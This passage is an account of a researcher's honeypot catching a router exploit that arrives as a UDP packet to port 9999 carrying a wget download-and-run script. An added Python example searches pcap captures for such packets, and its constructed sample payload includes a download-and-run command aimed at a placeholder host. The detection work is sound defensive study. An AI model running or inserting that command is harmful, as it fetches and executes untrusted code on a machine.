Chapter One: The Packet

This all started because I was bored and looking for something to do. Really.

One weekend in June I set up a honeypot: simply an Ubuntu Linux system running Apache, with full packet capture running under tcpdump. I was expecting to capture Shellshock exploitation attempts against the web server. So one of the first things I did was to search the captures for the string wget, which would indicate that an attacker was attempting to break into a computer (my decoy honeypot) and instructing it to download a larger, more complex program. I found wget all right, but not in the place I expected.

This network packet started everything: a packet to UDP port 9999 with an embedded shell script, instructing the computer to use wget to download a file and run it. One computer on the Internet has no business telling another computer what to do by sending a command out of nowhere; there is no authentication. So right away, I knew I had something “bad”. But what?
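The search described above (a tcpdump capture, scanned for UDP datagrams to port 9999 whose payload carries the string wget) as an added example, not code from the original chapter. It builds a small constructed pcap in memory so it runs offline; the IP addresses and the URL are placeholders, and the parser assumes a little-endian pcap with Ethernet framing, as tcpdump writes on common hardware.

```python
import struct

PCAP_MAGIC_LE = 0xA1B2C3D4  # little-endian libpcap header, as tcpdump writes on x86

def build_pcap(frames):
    """Constructed sample: wrap raw Ethernet frames in a minimal libpcap file (link type 1)."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out

def udp_frame(src_ip, dst_ip, sport, dport, payload):
    """Constructed sample: Ethernet/IPv4/UDP frame with the given payload (checksums left zero)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return b"\x00" * 12 + b"\x08\x00" + ip + udp  # zero MACs, EtherType IPv4

def find_udp_commands(pcap_bytes, port=9999, marker=b"wget"):
    """Return (src_ip, payload) for every UDP datagram to `port` whose payload contains `marker`."""
    if struct.unpack("<I", pcap_bytes[:4])[0] != PCAP_MAGIC_LE:
        raise ValueError("only little-endian pcap files are handled in this example")
    hits, off = [], 24  # skip the 24-byte global header
    while off + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack("<IIII", pcap_bytes[off:off + 16])
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue  # not IPv4 over Ethernet
        ihl = (frame[14] & 0x0F) * 4  # IPv4 header length in bytes
        if frame[23] != 17:
            continue  # IP protocol field: not UDP
        udp_start = 14 + ihl
        dport = struct.unpack("!H", frame[udp_start + 2:udp_start + 4])[0]
        payload = frame[udp_start + 8:]
        if dport == port and marker in payload:
            src = ".".join(str(b) for b in frame[26:30])  # IPv4 source address
            hits.append((src, payload))
    return hits

# Constructed traffic: one harmless UDP probe and one datagram carrying a download-and-run script.
SAMPLE_PCAP = build_pcap([
    udp_frame("203.0.113.5", "192.0.2.10", 40000, 9999, b"hello"),
    udp_frame("198.51.100.7", "192.0.2.10", 40001, 9999,
              b"cd /tmp; wget http://placeholder.invalid/x.sh; sh x.sh"),
])
```

Against a real capture, read the file bytes and pass them to find_udp_commands; each hit gives the sending address and the embedded script for further analysis.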

But there’s more. Minutes before the attempt to exploit an Asus vulnerability, the same IP address attempted to exploit a vulnerability in Cisco/Linksys routers.

So, one IP address attempts to break into another system on the Internet, first using a backdoor into Linksys hardware, then a few minutes later using a backdoor into Asus hardware. Some searching did not turn up any public discussion of this tactic.

At this point I was thrilled and was eager to chase this threat. The instruction in the Asus exploit directed the would-be victim to download another program and run it. I tried to download the program in the same way, but the downloads were never successful. As I continued to capture exploitation attempts from multiple IP addresses around the world, I knew I would have to get smarter.